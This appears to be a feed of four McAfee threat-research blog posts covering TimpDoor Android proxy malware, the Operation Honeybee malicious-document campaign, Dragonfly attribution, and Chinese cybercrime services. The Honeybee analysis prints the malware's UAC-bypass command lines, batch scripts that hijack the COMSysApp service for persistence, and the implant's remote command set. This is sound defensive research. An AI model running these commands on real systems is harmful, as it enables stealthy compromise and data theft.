Android/TimpDoor Turns Mobile Devices Into Hidden Proxies

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all …

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel—allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors. McAfee Mobile Security detects this malware as Android/TimpDoor.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Based on our analysis of 26 malicious APK files found on the main distribution server, the earliest TimpDoor variant has been available since March, with the latest APK from the end of August. According to our telemetry data, these apps have infected at least 5,000 devices. The malicious apps have been distributed via an active phishing campaign via SMS in the United States since at least the end of March. McAfee notified the unwitting hosts of the phishing domains and the malware distribution server; at the time of writing this post we have confirmed that they are no longer active.

Campaign targets North America

Since at least the end of March users in the United States have reported suspicious text messages informing them that they have two voice messages to review and tricking them into clicking a URL to hear them:

Figure 1. User reporting a text that required downloading a fake voice app. Source

Figure 2. An August 9 text. Source:

Figure 3. An August 26 text. Source:

If the user clicks on one of these links in a mobile device, the browser displays a fake web page that pretends to be from a popular classified advertisement website and asks the user to install an application to listen to the voice messages:

Figure 4. A fake website asking the user to download a voice app.

In addition to the link that provides the malicious APK, the fake site includes detailed instructions on how to disable “Unknown Sources” to install the app that was downloaded outside Google Play.

Fake voice app

When the user clicks on “Download Voice App,” the file VoiceApp.apk is downloaded from a remote server. If the victim follows the instructions, the following screens appear to make the app look legitimate:

Figure 5. Fake voice app initial screens.

The preceding screens are displayed only if the Android version of the infected device is 7.1 or later (API Level 25). If the Android version is earlier, the app skips the initial screens and displays the main fake interface to listen to the “messages”:

Figure 6. The main interface of the fake voice messages app.

Everything on the main screen is fake. The Recents, Saved, and Archive icons have no functionality. The only buttons that work play the fake audio files. The duration of the voice messages does not correspond with the length of the audio files and the phone numbers are fake, present in the resources of the app.

Once the user listens to the fake messages and closes the app, the icon is hidden from the home screen to make it difficult to remove. Meanwhile, it starts a service in the background without user’s knowledge:

Figure 7. Service running in the background.

Socks proxy over SSH

As soon as the service starts, the malware gathers device information: device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. To gather the public IP address information, TimpDoor uses a free geolocation service to obtain the data (country, region, city, latitude, longitude, public IP address, and ISP) in JSON format. In case the HTTP request fails, the malware make an HTTP request to the webpage getIP.php of the main control server that provides the value “public_ip.”

Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID. This port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server. In addition to starting the proxy server through an SSH tunnel, TimpDoor establishes mechanisms to keep the SSH connection alive such as monitoring changes in the network connectivity and setting up an alarm to constantly check the established SSH tunnel:

Figure 8. An execution thread checking changes in connectivity and making sure the SSH tunnel is running.

To ensure the SSH tunnel is up, TimpDoor executes the method updateStatus, which sends the previously collected device information and local/public IP address data to the control server via SSH.

Mobile malware distribution server

By checking the IP address 199.192.19[.]18, which hosted VoiceApp.apk, we found more APK files in the directory US. This likely stands for United States, considering that the fake phone numbers in the voice app are in the country and the messages are sent from US phone numbers:

Figure 9. APK files in the “US” folder of the main malware distribution server.

According to the “Last modified” dates on the server, the oldest APK in the folder is chainmail.apk (March 12) while the newest is VoiceApp.apk (August 27) suggesting the campaign has run for at least five months and is likely still active.

We can divide the APK files into two groups by size (5.1MB and 3.1MB). The main difference between them is that the oldest use an HTTP proxy (LittleProxy) while the newest (July and August) use a Socks proxy (MicroSocks), which allows the routing of all traffic for any kind of network protocol (not only HTTP)TTp on any port. Other notable differences are the package name, control server URLs, and the value of appVersion in the updateStatus method—ranging from 1.1.0 to 1.4.0.

In addition to the US folder we also found a CA folder, which could stand for Canada.

Figure 10. The “CA” folder on the distribution server.

Checking the files in the CA folder we found that VoiceApp.apk and relevanbest.apk are the same file with appVersion 1.4.0 (Socks proxy server). Octarineiads.apk is version 1.1.0, with an HTTP proxy.

TimpDoor vs MilkyDoor

TimpDoor is not the first malware that turns Android devices into mobile proxies to forward network traffic from a control server using a Socks proxy though an SSH tunnel. In April 2017 researchers discovered MilkyDoor, an apparent successor of DressCode, which was found a year earlier. Both threats were distributed as Trojanized apps in Google Play. DressCode installs only a Socks proxy server on the infected device; MilkyDoor also protects that connection to bypass network security restrictions using remote port forwarding via SSH, just as TimpDoor does. However, there are some relevant differences between TimpDoor and MilkyDoor:

  • Distribution: Instead of being part of a Trojanized app in Google Play, TimpDoor uses a completely fake voice app distributed via text message
  • SSH connection: While MilkyDoor uploads the device and IP address information to a control server to receive the connection details, TimpDoor already has the information in its code. TimpDoor uses the information to get the remote port to perform dynamic port forwarding and to periodically send updated device data.
  • Pure proxy functionality: MilkyDoor was apparently an adware integrator in early versions of the SDK and later added backdoor functionality. TimpDoor’s sole purpose (at least in this campaign) is to keep the SSH tunnel open and the proxy server running in the background without the user’s consent.

MilkyDoor seems to be a more complete SDK, with adware and downloader functionality. TimpDoor has only basic proxy functionality, first using an HTTP proxy and later Socks.


TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them shows that this threat is probably still under development. We expect it will evolve into new variants.

Although this threat has not been seen on Google Play, this SMS phishing campaign distributing TimpDoor shows that cybercriminals are still using traditional phishing techniques to trick users into installing malicious applications.

McAfee Mobile Security detects this threat as Android/TimpDoor. To protect yourselves from this and similar threats, employ security software on your mobile devices and do not install apps from unknown sources.

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups

This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra. 
McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean politi…

This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra. 

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.

Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them.

The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.


On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor. The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee.

Document properties.

This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.

Examples of decoy documents.

Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content.

We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office,” drops an implant with the control server address, which resolves to the same server used by the implants dropped in the Honeybee case.

The directory contents of control server

The directory contents of, from Honeybee samples.


Log files of compromised machines from February 2018 Honeybee samples.

MaoCheng Dropper

Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path.

D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb

The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it.

The decoy document uses the cloud-based accounting software company Xero as a lure:

A decoy document from MaoCheng dropper.

Possible Operator

The Advanced Threat Research team has identified the following persona ([email protected]) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts:, which refers to the popular South Korean search engine, and The email address was used to register a free account for a control server in all the implants described in our analysis. 

Technical Analysis

Let’s start with an overview of the attack:

We continue with the components involved in this operation.

The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro.

The Document_Open() subroutine implementing the malicious functionality.

The Visual Basic macro performs the following tasks:

  • Opens a handle to the malicious document to read the encoded CAB file
  • Decodes the CAB file and writes it to the disk at %temp%\

Encoded CAB file in the Word document.

Decoding and writing the CAB file to %temp%.

The decoded CAB file in the Visual Basic memory buffer.

The CAB file contains the following files and functions:

  • dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb.
  • bat: A batch file to set up the service COMSysApp, for an x64 system
  • bat: A batch file to set up the service COMSysApp, for an x86 system
  • ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file.

Decoded credential data contained in ipnet.ini. 

  • dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path: D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb.
  • The macro then extracts the CAB file into %systemroo%\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts
  • Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections)
  • Command lines used by the Visual Basic macro:
cmd /c wusa %TEMP%\ /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\ && cliconfg.exe
cmd /c expand %TEMP%\ -F:* %SystemRoot%\System32 && del /f /q %TEMP%\ && cliconfg.exe

A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires:

  • A Windows executable with the auto-elevate property in its manifest
  • A Windows executable in a secure directory (%systemroot%\system32)

The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\system32):

NTWDBLIB executing the installer batch files under the context of cliconfg.exe. 

The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86):

install1.bat (x64)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\SysWOW64\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat

install2.bat (x86)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\System32\install1.bat
del /f /q %windir%\System32\install2.bat

The batch files perform these tasks:

  • Stop the service COMSysApp
  • Configure the service to autostart (to set up persistence on the system)
  • Modify registry keys to launch the DLL unser svchost.exe
  • Specify the malicious DLL path to be loaded into the svchost process.
  • Immediately restart the service
  • Remove the batch files to reduce the fingerprint on the system 

IPNet.dll runs as a service under svchost.exe.

The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using:

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

All the following capabilities described are implemented by the malicious service DLL implant unless specified.  

Variant using North Korean Red Cross

Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key. This document was created January 10.

Contents of the decoy document.

This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).

The key differences in this variant:

  • Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file
  • There is one CAB file for an x86 system and another for an x64 system
  • This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass
    • exe is the program vulnerable to the UAC bypass attack
    • dll runs install.bat to set up the service (same as NTWDBLIB.dll)
  • exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.
  • The Visual Basic macro uses the following command line:
cmd /c expand %TEMP%\ -F:* %TEMP% && cd /d %TEMP% && del /f /q && uacme.exe
  • The control server credential information contained in the CAB files is different:

Decoded credential data contained in another ipnet.ini.

Similarities between this variant and the original malware sample:

  • Service name is the same: COMSysApp
  • The DLL and ini files contain the same functions as described elsewhere in this post

Data Reconnaissance

The following information is gathered from the endpoint and sent to the control server.

  • System info:
    • Computer name
    • System info using: cmd /c systeminfo >%temp%\temp.ini
    • List of currently running process using: cmd /c tasklist >%temp%\temp.ini


  • The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-02).txt

  • All the text files are now packed into the archive (%temp%\
  • zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt
  • txt is uploaded to the control server

Additional Commands and Capabilities

The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords:

  • TO EVERYONE: Commands issued to all infected endpoints
  • TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName

The following commands are supported by the malware implant:

  • cmd /c pull <filename>: Adds filename to, Base64 encodes, and uploads to control server
  • cmd /c chip <string>: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.
  • cmd /c put <new_file_name> <existing_file_name>: Copies existing file to new file name. Deletes existing file.
  • /user <parameters>: Executes downloaded file with parameters specified using CreateProcessAsUser
  • cmd /c <command>: Executes command on infected endpoint 


The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean speaker.

The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.

Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor. Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild.


Indicators of compromise

MITRE ATT&CK techniques

  • Modify existing service
  • Code signing
  • File deletion
  • Deobfuscate/decode files or information
  • System information discovery
  • Process discovery
  • Service execution
  • RunDLL32
  • Scripting
  • Command-line Interface
  • Data from local system
  • Automated exfiltration
  • Data encrypted
  • Commonly used port
  • Bypass user account control


  • fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3
  • f684e15dd2e84bac49ea9b89f9b2646dc32a2477
  • 1d280a77595a2d2bbd36b9b5d958f99be20f8e06
  • 19d9573f0b2c2100accd562cc82d57adb12a57ec
  • f90a2155ac492c3c2d5e1d83e384e1a734e59cc0
  • 9b832dda912cce6b23da8abf3881fcf4d2b7ce09
  • f3b62fea38cb44e15984d941445d24e6b309bc7b
  • 66d2cea01b46c3353f4339a986a97b24ed89ee18
  • 7113aaab61cacb6086c5531a453adf82ca7e7d03
  • d41daba0ebfa55d0c769ccfc03dbf6a5221e006a
  • 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c
  • 35ab747c15c20da29a14e8b46c07c0448cef4999
  • e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42
  • 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0
  • bca861a46d60831a3101c50f80a6d626fa99bf16
  • 01530adb3f947fabebae5d9c04fb69f9000c3cef
  • 4229896d61a5ad57ed5c247228606ce62c7032d0
  • 4c7e975f95ebc47423923b855a7530af52977f57
  • 5a6ad7a1c566204a92dd269312d1156d51e61dc4
  • 1dc50bfcab2bc80587ac900c03e23afcbe243f64
  • 003e21b02be3248ff72cc2bfcd05bb161b6a2356
  • 9b7c3c48bcef6330e3086de592b3223eb198744a
  • 85e2453b37602429596c9681a8c58a5c6faf8d0c



The post McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups appeared first on McAfee Blogs.

Operation Dragonfly Analysis Suggests Links to Earlier Attacks

On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.
Moving beyond our 2014 analysis of D…

On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

Going Beyond Energy

Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and exploits of supply-chain technologies via previous campaigns. By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.

Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

One of the starting points was a Trojan in the 2017 campaign with the following hashes:

  • MD5: da9d8c78efe0c6c8be70e6b857400fb1
  • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

  • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
  • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
  • Filename: fl.exe

The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. In their report on about ‘“TeamSpy,” they mentioned the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date details: 2011:09:07 – 09:27:58+01:00

The TeamSpy attacks were originally aimed at political and human right activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.

Actor Sophistication

Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of efforts. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code in their campaigns.

How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have  mentioned a few. The Dragonfly group is in the top echelon of targeting attackers; it is critical that those in the targeted sectors be aware of them.

The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.


We would like to thank the team at Intezer for their assistance and support during our research.

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an ev…

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.


Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.


The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit


The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.


Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.